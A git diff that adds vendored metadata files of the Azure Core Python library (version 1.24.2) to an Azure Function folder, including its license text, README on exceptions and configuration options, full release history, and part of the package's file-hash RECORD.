Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all +copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +SOFTWARE. \ No newline at end of file diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/METADATA b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/METADATA new file mode 100644 index 0000000..3150f6f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/METADATA @@ -0,0 +1,794 @@ +Metadata-Version: 2.1 +Name: azure-core +Version: 1.24.2 +Summary: Microsoft Azure Core Library for Python +Home-page: https://github.com/Azure/azure-sdk-for-python/tree/main/sdk/core/azure-core +Author: Microsoft Corporation +Author-email: azpysdkhelp@microsoft.com +License: MIT License +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.6 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: License :: OSI Approved :: MIT License +Requires-Python: >=3.6 +Description-Content-Type: text/markdown +Requires-Dist: requests (>=2.18.4) +Requires-Dist: six (>=1.11.0) +Requires-Dist: typing-extensions (>=4.0.1) + + +# Azure Core shared client library for Python + +Azure core provides shared exceptions and modules for Python SDK client libraries. +These libraries follow the [Azure SDK Design Guidelines for Python](https://azure.github.io/azure-sdk/python/guidelines/index.html) . + +If you are a client library developer, please reference [client library developer reference](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/CLIENT_LIBRARY_DEVELOPER.md) for more information. + +[Source code](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/) | [Package (Pypi)][package] | [API reference documentation](https://github.com/Azure/azure-sdk-for-python/blob/main/sdk/core/azure-core/) + +## _Disclaimer_ + +_Azure SDK Python packages support for Python 2.7 has ended 01 January 2022. For more information and questions, please refer to _ + +## Getting started + +Typically, you will not need to install azure core; +it will be installed when you install one of the client libraries using it. +In case you want to install it explicitly (to implement your own client library, for example), +you can find it [here](https://pypi.org/project/azure-core/). + +## Key concepts + +### Azure Core Library Exceptions + +#### AzureError + +AzureError is the base exception for all errors. + +```python +class AzureError(Exception): + def __init__(self, message, *args, **kwargs): + self.inner_exception = kwargs.get("error") + self.exc_type, self.exc_value, self.exc_traceback = sys.exc_info() + self.exc_type = self.exc_type.__name__ if self.exc_type else type(self.inner_exception) + self.exc_msg = "{}, {}: {}".format(message, self.exc_type, self.exc_value) # type: ignore + self.message = str(message) + self.continuation_token = kwargs.get("continuation_token") + super(AzureError, self).__init__(self.message, *args) +``` + +*message* is any message (str) to be associated with the exception. + +*args* are any additional args to be included with exception. + +*kwargs* are keyword arguments to include with the exception. Use the keyword *error* to pass in an internal exception and *continuation_token* for a token reference to continue an incomplete operation. + +**The following exceptions inherit from AzureError:** + +#### ServiceRequestError + +An error occurred while attempt to make a request to the service. No request was sent. + +#### ServiceResponseError + +The request was sent, but the client failed to understand the response. +The connection may have timed out. These errors can be retried for idempotent or safe operations. + +#### HttpResponseError + +A request was made, and a non-success status code was received from the service. + +```python +class HttpResponseError(AzureError): + def __init__(self, message=None, response=None, **kwargs): + self.reason = None + self.response = response + if response: + self.reason = response.reason + self.status_code = response.status_code + self.error = self._parse_odata_body(ODataV4Format, response) # type: Optional[ODataV4Format] + if self.error: + message = str(self.error) + else: + message = message or "Operation returned an invalid status '{}'".format( + self.reason + ) + + super(HttpResponseError, self).__init__(message=message, **kwargs) +``` + +*message* is the HTTP response error message (optional) + +*response* is the HTTP response (optional). + +*kwargs* are keyword arguments to include with the exception. + +**The following exceptions inherit from HttpResponseError:** + +#### DecodeError + +An error raised during response de-serialization. + +#### IncompleteReadError + +An error raised if peer closes the connection before we have received the complete message body. + +#### ResourceExistsError + +An error response with status code 4xx. This will not be raised directly by the Azure core pipeline. + +#### ResourceNotFoundError + +An error response, typically triggered by a 412 response (for update) or 404 (for get/post). + +#### ResourceModifiedError + +An error response with status code 4xx, typically 412 Conflict. This will not be raised directly by the Azure core pipeline. + +#### ResourceNotModifiedError + +An error response with status code 304. This will not be raised directly by the Azure core pipeline. + +#### ClientAuthenticationError + +An error response with status code 4xx. This will not be raised directly by the Azure core pipeline. + +#### TooManyRedirectsError + +An error raised when the maximum number of redirect attempts is reached. The maximum amount of redirects can be configured in the RedirectPolicy. + +```python +class TooManyRedirectsError(HttpResponseError): + def __init__(self, history, *args, **kwargs): + self.history = history + message = "Reached maximum redirect attempts." + super(TooManyRedirectsError, self).__init__(message, *args, **kwargs) +``` + +*history* is used to document the requests/responses that resulted in redirected requests. + +*args* are any additional args to be included with exception. + +*kwargs* are keyword arguments to include with the exception. + +#### StreamConsumedError + +An error thrown if you try to access the stream of `azure.core.rest.HttpResponse` or `azure.core.rest.AsyncHttpResponse` once +the response stream has been consumed. + +#### StreamClosedError + +An error thrown if you try to access the stream of the `azure.core.rest.HttpResponse` or `azure.core.rest.AsyncHttpResponse` once +the response stream has been closed. + +#### ResponseNotReadError + +An error thrown if you try to access the `content` of `azure.core.rest.HttpResponse` or `azure.core.rest.AsyncHttpResponse` before +reading in the response's bytes first. + +### Configurations + +When calling the methods, some properties can be configured by passing in as kwargs arguments. + +| Parameters | Description | +| --- | --- | +| headers | The HTTP Request headers. | +| request_id | The request id to be added into header. | +| user_agent | If specified, this will be added in front of the user agent string. | +| logging_enable| Use to enable per operation. Defaults to `False`. | +| logger | If specified, it will be used to log information. | +| response_encoding | The encoding to use if known for this service (will disable auto-detection). | +| proxies | Maps protocol or protocol and hostname to the URL of the proxy. | +| raw_request_hook | Callback function. Will be invoked on request. | +| raw_response_hook | Callback function. Will be invoked on response. | +| network_span_namer | A callable to customize the span name. | +| tracing_attributes | Attributes to set on all created spans. | +| permit_redirects | Whether the client allows redirects. Defaults to `True`. | +| redirect_max | The maximum allowed redirects. Defaults to `30`. | +| retry_total | Total number of retries to allow. Takes precedence over other counts. Default value is `10`. | +| retry_connect | How many connection-related errors to retry on. These are errors raised before the request is sent to the remote server, which we assume has not triggered the server to process the request. Default value is `3`. | +| retry_read | How many times to retry on read errors. These errors are raised after the request was sent to the server, so the request may have side-effects. Default value is `3`. | +| retry_status | How many times to retry on bad status codes. Default value is `3`. | +| retry_backoff_factor | A backoff factor to apply between attempts after the second try (most errors are resolved immediately by a second try without a delay). Retry policy will sleep for: `{backoff factor} * (2 ** ({number of total retries} - 1))` seconds. If the backoff_factor is 0.1, then the retry will sleep for [0.0s, 0.2s, 0.4s, ...] between retries. The default value is `0.8`. | +| retry_backoff_max | The maximum back off time. Default value is `120` seconds (2 minutes). | +| retry_mode | Fixed or exponential delay between attempts, default is `Exponential`. | +| timeout | Timeout setting for the operation in seconds, default is `604800`s (7 days). | +| connection_timeout | A single float in seconds for the connection timeout. Defaults to `300` seconds. | +| read_timeout | A single float in seconds for the read timeout. Defaults to `300` seconds. | +| connection_verify | SSL certificate verification. Enabled by default. Set to False to disable, alternatively can be set to the path to a CA_BUNDLE file or directory with certificates of trusted CAs. | +| connection_cert | Client-side certificates. You can specify a local cert to use as client side certificate, as a single file (containing the private key and the certificate) or as a tuple of both files' paths. | +| proxies | Dictionary mapping protocol or protocol and hostname to the URL of the proxy. | +| cookies | Dict or CookieJar object to send with the `Request`. | +| connection_data_block_size | The block size of data sent over the connection. Defaults to `4096` bytes. | + +### Async transport + +The async transport is designed to be opt-in. [AioHttp](https://pypi.org/project/aiohttp/) is one of the supported implementations of async transport. It is not installed by default. You need to install it separately. + +### Shared modules + +#### MatchConditions + +MatchConditions is an enum to describe match conditions. + +```python +class MatchConditions(Enum): + Unconditionally = 1 + IfNotModified = 2 + IfModified = 3 + IfPresent = 4 + IfMissing = 5 +``` + +#### CaseInsensitiveEnumMeta + +A metaclass to support case-insensitive enums. + +```python +from enum import Enum +from six import with_metaclass + +from azure.core import CaseInsensitiveEnumMeta + +class MyCustomEnum(with_metaclass(CaseInsensitiveEnumMeta, str, Enum)): + FOO = 'foo' + BAR = 'bar' +``` + +#### Null Sentinel Value + +A falsy sentinel object which is supposed to be used to specify attributes +with no data. This gets serialized to `null` on the wire. + +```python +from azure.core.serialization import NULL + +assert bool(NULL) is False + +foo = Foo( + attr=NULL +) +``` + +## Contributing + +This project welcomes contributions and suggestions. Most contributions require +you to agree to a Contributor License Agreement (CLA) declaring that you have +the right to, and actually do, grant us the rights to use your contribution. +For details, visit [https://cla.microsoft.com](https://cla.microsoft.com). + +When you submit a pull request, a CLA-bot will automatically determine whether +you need to provide a CLA and decorate the PR appropriately (e.g., label, +comment). Simply follow the instructions provided by the bot. You will only +need to do this once across all repos using our CLA. + +This project has adopted the +[Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). +For more information, see the +[Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) +or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any +additional questions or comments. + + +[package]: https://pypi.org/project/azure-core/ + + +# Release History + +## 1.24.2 (2022-06-30) + +### Bugs Fixed + +- Fixed the bug that azure-core could not be imported under Python 3.11.0b3 #24928 +- `ContentDecodePolicy` can now correctly deserialize more JSON bodies with different mime types #22410 + +## 1.24.1 (2022-06-01) + +### Bugs Fixed + +- Declare method level span as INTERNAL by default #24492 +- Fixed type hints for `azure.core.paging.ItemPaged` #24548 + +## 1.24.0 (2022-05-06) + +### Features Added + +- Add `SerializationError` and `DeserializationError` in `azure.core.exceptions` for errors raised during serialization / deserialization #24312 + +## 1.23.1 (2022-03-31) + +### Bugs Fixed + +- Allow stream inputs to the `content` kwarg of `azure.core.rest.HttpRequest` from objects with a `read` method #23578 + +## 1.23.0 (2022-03-03) + +### Features Added + +- Improve intellisense type hinting for service client methods. #22891 + +- Add a case insensitive dict `case_insensitive_dict` in `azure.core.utils`. #23206 + +### Bugs Fixed + +- Use "\n" rather than "/n" for new line in log. #23261 + +### Other Changes + +- Log "WWW-Authenticate" header in `HttpLoggingPolicy` #22990 +- Added dependency on `typing-extensions` >= 4.0.1 + +## 1.22.1 (2022-02-09) + +### Bugs Fixed + +- Limiting `final-state-via` scope to POST until consuming SDKs has been fixed to use this option properly on PUT. #22989 + +## 1.22.0 (2022-02-03) +_[**This version is deprecated.**]_ + +### Features Added + +- Add support for `final-state-via` LRO option in core. #22713 + +### Bugs Fixed + +- Add response body to string representation of `HttpResponseError` if we're not able to parse out information #22302 +- Raise `AttributeError` when calling azure.core.pipeline.transport.\_\_bases__ #22469 + +### Other Changes + +- Python 2.7 is no longer supported. Please use Python version 3.6 or later. + +## 1.21.1 (2021-12-06) + +### Other Changes + +- Revert change in str method #22023 + +## 1.21.0 (2021-12-02) + +### Breaking Changes + +- Sync stream downloading now raises `azure.core.exceptions.DecodeError` rather than `requests.exceptions.ContentDecodingError` + +### Bugs Fixed + +- Add response body to string representation of `HttpResponseError` if we're not able to parse out information #21800 + +## 1.20.1 (2021-11-08) + +### Bugs Fixed + +- Correctly set response's content to decompressed body when users are using aiohttp transport with decompression headers #21620 + +## 1.20.0 (2021-11-04) + +### Features Added + +- GA `send_request` onto the `azure.core.PipelineClient` and `azure.core.AsyncPipelineClient`. This method takes in +requests and sends them through our pipelines. +- GA `azure.core.rest`. `azure.core.rest` is our new public simple HTTP library in `azure.core` that users will use to create requests, and consume responses. +- GA errors `StreamConsumedError`, `StreamClosedError`, and `ResponseNotReadError` to `azure.core.exceptions`. These errors +are thrown if you mishandle streamed responses from the `azure.core.rest` module +- add kwargs to the methods for `iter_raw` and `iter_bytes` #21529 +- no longer raise JSON errors if users pass in file descriptors of JSON to the `json` kwarg in `HttpRequest` #21504 +- Added new error type `IncompleteReadError` which is raised if peer closes the connection before we have received the complete message body. + +### Breaking Changes + +- SansIOHTTPPolicy.on_exception returns None instead of bool. + +### Bugs Fixed + +- The `Content-Length` header in a http response is strictly checked against the actual number of bytes in the body, + rather than silently truncating data in case the underlying tcp connection is closed prematurely. + (thanks to @jochen-ott-by for the contribution) #20412 +- UnboundLocalError when SansIOHTTPPolicy handles an exception #15222 +- Add default content type header of `text/plain` and content length header for users who pass unicode strings to the `content` kwarg of `HttpRequest` in 2.7 #21550 + +## 1.19.1 (2021-11-01) + +### Bugs Fixed + +- respect text encoding specified in argument (thanks to @ryohji for the contribution) #20796 +- Fix "coroutine x.read() was never awaited" warning from `ContentDecodePolicy` #21318 +- fix type check for `data` input to `azure.core.rest` for python 2.7 users #21341 +- use `charset_normalizer` if `chardet` is not installed to migrate aiohttp 3.8.0 changes. + +### Other Changes + +- Refactor AzureJSONEncoder (thanks to @Codejune for the contribution) #21028 + +## 1.19.0 (2021-09-30) + +### Breaking Changes in the Provisional `azure.core.rest` package + +- `azure.core.rest.HttpResponse` and `azure.core.rest.AsyncHttpResponse` are now abstract base classes. They should not be initialized directly, instead +your transport responses should inherit from them and implement them. +- The properties of the `azure.core.rest` responses are now all read-only + +- HttpLoggingPolicy integrates logs into one record #19925 + +## 1.18.0 (2021-09-02) + +### Features Added + +- `azure.core.serialization.AzureJSONEncoder` (introduced in 1.17.0) serializes `datetime.datetime` objects in ISO 8601 format, conforming to RFC 3339's specification. #20190 +- We now use `azure.core.serialization.AzureJSONEncoder` to serialize `json` input to `azure.core.rest.HttpRequest`. + +### Breaking Changes in the Provisional `azure.core.rest` package + +- The `text` property on `azure.core.rest.HttpResponse` and `azure.core.rest.AsyncHttpResponse` has changed to a method, which also takes +an `encoding` parameter. +- Removed `iter_text` and `iter_lines` from `azure.core.rest.HttpResponse` and `azure.core.rest.AsyncHttpResponse` + +### Bugs Fixed + +- The behaviour of the headers returned in `azure.core.rest` responses now aligns across sync and async. Items can now be checked case-insensitively and without raising an error for format. + +## 1.17.0 (2021-08-05) + +### Features Added + +- Cut hard dependency on requests library +- Added a `from_json` method which now accepts storage QueueMessage, eventhub's EventData or ServiceBusMessage or simply json bytes to return a `CloudEvent` + +### Fixed + +- Not override "x-ms-client-request-id" if it already exists in the header. #17757 + +### Breaking Changes in the Provisional `azure.core.rest` package + +- `azure.core.rest` will not try to guess the `charset` anymore if it was impossible to extract it from `HttpResponse` analysis. This removes our dependency on `charset`. + +## 1.16.0 (2021-07-01) + +### Features Added + +- Add new ***provisional*** methods `send_request` onto the `azure.core.PipelineClient` and `azure.core.AsyncPipelineClient`. This method takes in +requests and sends them through our pipelines. +- Add new ***provisional*** module `azure.core.rest`. `azure.core.rest` is our new public simple HTTP library in `azure.core` that users will use to create requests, and consume responses. +- Add new ***provisional*** errors `StreamConsumedError`, `StreamClosedError`, and `ResponseNotReadError` to `azure.core.exceptions`. These errors +are thrown if you mishandle streamed responses from the provisional `azure.core.rest` module + +### Fixed + +- Improved error message in the `from_dict` method of `CloudEvent` when a wrong schema is sent. + +## 1.15.0 (2021-06-04) + +### New Features + +- Added `BearerTokenCredentialPolicy.on_challenge` and `.authorize_request` to allow subclasses to optionally handle authentication challenges + +### Bug Fixes + +- Retry policies don't sleep after operations time out +- The `from_dict` methhod in the `CloudEvent` can now convert a datetime string to datetime object when microsecond exceeds the python limitation + +## 1.14.0 (2021-05-13) + +### New Features + +- Added `azure.core.credentials.AzureNamedKeyCredential` credential #17548. +- Added `decompress` parameter for `stream_download` method. If it is set to `False`, will not do decompression upon the stream. #17920 + +## 1.13.0 (2021-04-02) + +Azure core requires Python 2.7 or Python 3.6+ since this release. + +### New Features + +- Added `azure.core.utils.parse_connection_string` function to parse connection strings across SDKs, with common validation and support for case insensitive keys. +- Supported adding custom policies #16519 +- Added `~azure.core.tracing.Link` that should be used while passing `Links` to `AbstractSpan`. +- `AbstractSpan` constructor can now take in additional keyword only args. + +### Bug fixes + +- Make NetworkTraceLoggingPolicy show the auth token in plain text. #14191 +- Fixed RetryPolicy overriding default connection timeout with an extreme value #17481 + +## 1.12.0 (2021-03-08) + +This version will be the last version to officially support Python 3.5, future versions will require Python 2.7 or Python 3.6+. + +### Features + +- Added `azure.core.messaging.CloudEvent` model that follows the cloud event spec. +- Added `azure.core.serialization.NULL` sentinel value +- Improve `repr`s for `HttpRequest` and `HttpResponse`s #16972 + +### Bug Fixes + +- Disable retry in stream downloading. (thanks to @jochen-ott-by @hoffmann for the contribution) #16723 + +## 1.11.0 (2021-02-08) + +### Features + +- Added `CaseInsensitiveEnumMeta` class for case-insensitive enums. #16316 +- Add `raise_for_status` method onto `HttpResponse`. Calling `response.raise_for_status()` on a response with an error code +will raise an `HttpResponseError`. Calling it on a good response will do nothing #16399 + +### Bug Fixes + +- Update conn.conn_kw rather than overriding it when setting block size. (thanks for @jiasli for the contribution) #16587 + +## 1.10.0 (2021-01-11) + +### Features + +- Added `AzureSasCredential` and its respective policy. #15946 + +## 1.9.0 (2020-11-09) + +### Features + +- Add a `continuation_token` attribute to the base `AzureError` exception, and set this value for errors raised + during paged or long-running operations. + +### Bug Fixes + +- Set retry_interval to 1 second instead of 1000 seconds (thanks **vbarbaresi** for contributing) #14357 + + +## 1.8.2 (2020-10-05) + +### Bug Fixes + +- Fixed bug to allow polling in the case of parameterized endpoints with relative polling urls #14097 + + +## 1.8.1 (2020-09-08) + +### Bug fixes + +- SAS credential replicated "/" fix #13159 + +## 1.8.0 (2020-08-10) + +### Features + +- Support params as list for exploding parameters #12410 + + +## 1.7.0 (2020-07-06) + +### Bug fixes + +- `AzureKeyCredentialPolicy` will now accept (and ignore) passed in kwargs #11963 +- Better error messages if passed endpoint is incorrect #12106 +- Do not JSON encore a string if content type is "text" #12137 + +### Features + +- Added `http_logging_policy` property on the `Configuration` object, allowing users to individually +set the http logging policy of the config #12218 + +## 1.6.0 (2020-06-03) + +### Bug fixes + +- Fixed deadlocks in AsyncBearerTokenCredentialPolicy #11543 +- Fix AttributeException in StreamDownloadGenerator #11462 + +### Features + +- Added support for changesets as part of multipart message support #10485 +- Add AsyncLROPoller in azure.core.polling #10801 +- Add get_continuation_token/from_continuation_token/polling_method methods in pollers (sync and async) #10801 +- HttpResponse and PipelineContext objects are now pickable #10801 + +## 1.5.0 (2020-05-04) + +### Features + +- Support "x-ms-retry-after-ms" in response header #10743 +- `link` and `link_from_headers` now accepts attributes #10765 + +### Bug fixes + +- Not retry if the status code is less than 400 #10778 +- "x-ms-request-id" is not considered safe header for logging #10967 + +## 1.4.0 (2020-04-06) + +### Features + +- Support a default error type in map_error #9773 +- Added `AzureKeyCredential` and its respective policy. #10509 +- Added `azure.core.polling.base_polling` module with a "Microsoft One API" polling implementation #10090 + Also contains the async version in `azure.core.polling.async_base_polling` +- Support kwarg `enforce_https` to disable HTTPS check on authentication #9821 +- Support additional kwargs in `HttpRequest.set_multipart_mixed` that will be passed into pipeline context. + +## 1.3.0 (2020-03-09) + +### Bug fixes + +- Appended RequestIdPolicy to the default pipeline #9841 +- Rewind the body position in async_retry #10117 + +### Features + +- Add raw_request_hook support in custom_hook_policy #9958 +- Add timeout support in retry_policy #10011 +- Add OdataV4 error format auto-parsing in all exceptions ('error' attribute) #9738 + +## 1.2.2 (2020-02-10) + +### Bug fixes + +- Fixed a bug that sends None as request_id #9545 +- Enable mypy for customers #9572 +- Handle TypeError in deep copy #9620 +- Fix text/plain content-type in decoder #9589 + +## 1.2.1 (2020-01-14) + +### Bug fixes + +- Fixed a regression in 1.2.0 that was incompatible with azure-keyvault-* 4.0.0 +[#9462](https://github.com/Azure/azure-sdk-for-python/issues/9462) + + +## 1.2.0 (2020-01-14) + +### Features + +- Add user_agent & sdk_moniker kwargs in UserAgentPolicy init #9355 +- Support OPTIONS HTTP verb #9322 +- Add tracing_attributes to tracing decorator #9297 +- Support auto_request_id in RequestIdPolicy #9163 +- Support fixed retry #6419 +- Support "retry-after-ms" in response header #9240 + +### Bug fixes + +- Removed `__enter__` and `__exit__` from async context managers #9313 + +## 1.1.1 (2019-12-03) + +### Bug fixes + +- Bearer token authorization requires HTTPS +- Rewind the body position in retry #8307 + +## 1.1.0 (2019-11-25) + +### Features + +- New RequestIdPolicy #8437 +- Enable logging policy in default pipeline #8053 +- Normalize transport timeout. #8000 + Now we have: + * 'connection_timeout' - a single float in seconds for the connection timeout. Default 5min + * 'read_timeout' - a single float in seconds for the read timeout. Default 5min + +### Bug fixes + +- RequestHistory: deepcopy fails if request contains a stream #7732 +- Retry: retry raises error if response does not have http_response #8629 +- Client kwargs are now passed to DistributedTracingPolicy correctly #8051 +- NetworkLoggingPolicy now logs correctly all requests in case of retry #8262 + +## 1.0.0 (2019-10-29) + +### Features + +- Tracing: DistributedTracingPolicy now accepts kwargs network_span_namer to change network span name #7773 +- Tracing: Implementation of AbstractSpan can now use the mixin HttpSpanMixin to get HTTP span update automatically #7773 +- Tracing: AbstractSpan contract "change_context" introduced #7773 +- Introduce new policy HttpLoggingPolicy #7988 + +### Bug fixes + +- Fix AsyncioRequestsTransport if input stream is an async generator #7743 +- Fix form-data with aiohttp transport #7749 + +### Breaking changes + +- Tracing: AbstractSpan.set_current_span is longer supported. Use change_context instead. #7773 +- azure.core.pipeline.policies.ContentDecodePolicy.deserialize_from_text changed + +## 1.0.0b4 (2019-10-07) + +### Features + +- Tracing: network span context is available with the TRACING_CONTEXT in pipeline response #7252 +- Tracing: Span contract now has `kind`, `traceparent` and is a context manager #7252 +- SansIOHTTPPolicy methods can now be coroutines #7497 +- Add multipart/mixed support #7083: + + - HttpRequest now has a "set_multipart_mixed" method to set the parts of this request + - HttpRequest now has a "prepare_multipart_body" method to build final body. + - HttpResponse now has a "parts" method to return an iterator of parts + - AsyncHttpResponse now has a "parts" methods to return an async iterator of parts + - Note that multipart/mixed is a Python 3.x only feature + +### Bug fixes + +- Tracing: policy cannot fail the pipeline, even in the worst condition #7252 +- Tracing: policy pass correctly status message if exception #7252 +- Tracing: incorrect span if exception raised from decorated function #7133 +- Fixed urllib3 ConnectTimeoutError being raised by Requests during a socket timeout. Now this exception is caught and wrapped as a `ServiceRequestError` #7542 + +### Breaking changes + +- Tracing: `azure.core.tracing.context` removed +- Tracing: `azure.core.tracing.context.tracing_context.with_current_context` renamed to `azure.core.tracing.common.with_current_context` #7252 +- Tracing: `link` renamed `link_from_headers` and `link` takes now a string +- Tracing: opencensus implementation has been moved to the package `azure-core-tracing-opencensus` +- Some modules and classes that were importables from several differente places have been removed: + + - `azure.core.HttpResponseError` is now only `azure.core.exceptions.HttpResponseError` + - `azure.core.Configuration` is now only `azure.core.configuration.Configuration` + - `azure.core.HttpRequest` is now only `azure.core.pipeline.transport.HttpRequest` + - `azure.core.version` module has been removed. Use `azure.core.__version__` to get version number. + - `azure.core.pipeline_client` has been removed. Import from `azure.core` instead. + - `azure.core.pipeline_client_async` has been removed. Import from `azure.core` instead. + - `azure.core.pipeline.base` has been removed. Import from `azure.core.pipeline` instead. + - `azure.core.pipeline.base_async` has been removed. Import from `azure.core.pipeline` instead. + - `azure.core.pipeline.policies.base` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.base_async` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.authentication` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.authentication_async` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.custom_hook` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.redirect` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.redirect_async` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.retry` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.retry_async` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.distributed_tracing` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.pipeline.policies.universal` has been removed. Import from `azure.core.pipeline.policies` instead. + - `azure.core.tracing.abstract_span` has been removed. Import from `azure.core.tracing` instead. + - `azure.core.pipeline.transport.base` has been removed. Import from `azure.core.pipeline.transport` instead. + - `azure.core.pipeline.transport.base_async` has been removed. Import from `azure.core.pipeline.transport` instead. + - `azure.core.pipeline.transport.requests_basic` has been removed. Import from `azure.core.pipeline.transport` instead. + - `azure.core.pipeline.transport.requests_asyncio` has been removed. Import from `azure.core.pipeline.transport` instead. + - `azure.core.pipeline.transport.requests_trio` has been removed. Import from `azure.core.pipeline.transport` instead. + - `azure.core.pipeline.transport.aiohttp` has been removed. Import from `azure.core.pipeline.transport` instead. + - `azure.core.polling.poller` has been removed. Import from `azure.core.polling` instead. + - `azure.core.polling.async_poller` has been removed. Import from `azure.core.polling` instead. + +## 1.0.0b3 (2019-09-09) + +### Bug fixes + +- Fix aiohttp auto-headers #6992 +- Add tracing to policies module init #6951 + +## 1.0.0b2 (2019-08-05) + +### Breaking changes + +- Transport classes don't take `config` parameter anymore (use kwargs instead) #6372 +- `azure.core.paging` has been completely refactored #6420 +- HttpResponse.content_type attribute is now a string (was a list) #6490 +- For `StreamDownloadGenerator` subclasses, `response` is now an `HttpResponse`, and not a transport response like `aiohttp.ClientResponse` or `requests.Response`. The transport response is available in `internal_response` attribute #6490 + +### Bug fixes + +- aiohttp is not required to import async pipelines classes #6496 +- `AsyncioRequestsTransport.sleep` is now a coroutine as expected #6490 +- `RequestsTransport` is not tight to `ProxyPolicy` implementation details anymore #6372 +- `AiohttpTransport` does not raise on unexpected kwargs #6355 + +### Features + +- New paging base classes that support `continuation_token` and `by_page()` #6420 +- Proxy support for `AiohttpTransport` #6372 + +## 1.0.0b1 (2019-06-26) + +- Preview 1 release + + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/RECORD b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/RECORD new file mode 100644 index 0000000..2b09c69 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure_core-1.24.2.dist-info/RECORD @@ -0,0 +1,145 @@ +azure/core/__init__.py,sha256=UNNuU_GpTKOua8WkZkBzdLKd8KMrNbtrPtd8v2xsZFE,1790 +azure/core/__pycache__/__init__.cpython-39.pyc,, +azure/core/__pycache__/_enum_meta.cpython-39.pyc,, +azure/core/__pycache__/_match_conditions.cpython-39.pyc,, +azure/core/__pycache__/_pipeline_client.cpython-39.pyc,, +azure/core/__pycache__/_pipeline_client_async.cpython-39.pyc,, +azure/core/__pycache__/_version.cpython-39.pyc,, +azure/core/__pycache__/async_paging.cpython-39.pyc,, +azure/core/__pycache__/configuration.cpython-39.pyc,, +azure/core/__pycache__/credentials.cpython-39.pyc,, +azure/core/__pycache__/credentials_async.cpython-39.pyc,, +azure/core/__pycache__/exceptions.cpython-39.pyc,, +azure/core/__pycache__/messaging.cpython-39.pyc,, +azure/core/__pycache__/paging.cpython-39.pyc,, +azure/core/__pycache__/serialization.cpython-39.pyc,, +azure/core/__pycache__/settings.cpython-39.pyc,, +azure/core/_enum_meta.py,sha256=A5cT4ceRM_KROd3XE3Lka4WlN_GvBDDdzi3mf6_Nywc,2549 +azure/core/_match_conditions.py,sha256=UdLPTnjxbLPoLUOOG96UjztmjYKnZwu8Aq0Hc30xDVQ,1506 +azure/core/_pipeline_client.py,sha256=aLqGyeulEAjIYR8s-3eDjCqrtXxmOoiSzjl1GSqk2Gs,8138 +azure/core/_pipeline_client_async.py,sha256=xti0sAOYuqdqs3FldrnGEnqGIvLjZOzhUvMol7pKZ88,9070 +azure/core/_version.py,sha256=v83ei7UnX7OBxKOqHZPToh6y5a2BjgKXPDpUcv8ZgYk,493 +azure/core/async_paging.py,sha256=me6I71wQ9vB7qOZ-_7Wis1hvlBhNu_ficR7WXgdC7lQ,6037 +azure/core/configuration.py,sha256=WXUMf_LGC6hRLXhem5YDqttO-ZDHUNbwQMpIGRphK50,5609 +azure/core/credentials.py,sha256=JncR7S2mNmuGzIuSUk8PRNxXe2NbnJ1QOubI6HsjdIQ,5774 +azure/core/credentials_async.py,sha256=y9cS-roHDr1-Ie0Iz0Wd2R3E8wBdJ0tqef3eQBaq7ik,1227 +azure/core/exceptions.py,sha256=DrSey5jQmhqDKLDCU_OhlS32solRdKDGiiU4bvJdeyk,20142 +azure/core/messaging.py,sha256=gxEUVPjaLrr7eWimXjcpcxycrioyYGxMu37JFSZ08R4,8891 +azure/core/paging.py,sha256=ch7kQQHpDVtEmLTVc8z5NdflxItE3rxDoidVdTl8_Bs,4891 +azure/core/pipeline/__init__.py,sha256=TLH4nNCQ2LhQfBHSpytpYjUslMcLEnT_m_9l_xk0v1M,7277 +azure/core/pipeline/__pycache__/__init__.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_base.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_base_async.cpython-39.pyc,, +azure/core/pipeline/__pycache__/_tools.cpython-39.pyc,, 